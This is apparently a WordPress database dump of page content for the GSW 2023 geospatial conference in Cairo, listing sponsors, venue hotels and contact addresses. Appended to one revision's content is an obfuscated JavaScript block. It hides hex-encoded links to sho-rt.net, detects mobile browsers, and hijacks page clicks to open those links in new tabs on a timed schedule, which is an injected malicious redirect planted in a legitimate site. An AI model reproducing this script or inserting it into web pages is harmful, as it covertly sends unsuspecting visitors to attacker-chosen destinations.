link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:50:30','2023-06-24 01:50:30','',3066,'https://gsw2023.com/?p=4809',0,'revision','',0),
(4810,1,'2023-06-24 01:51:30','2023-06-24 01:51:30','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687570910477{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>&nbsp;[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571413442{margin-top: -70px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 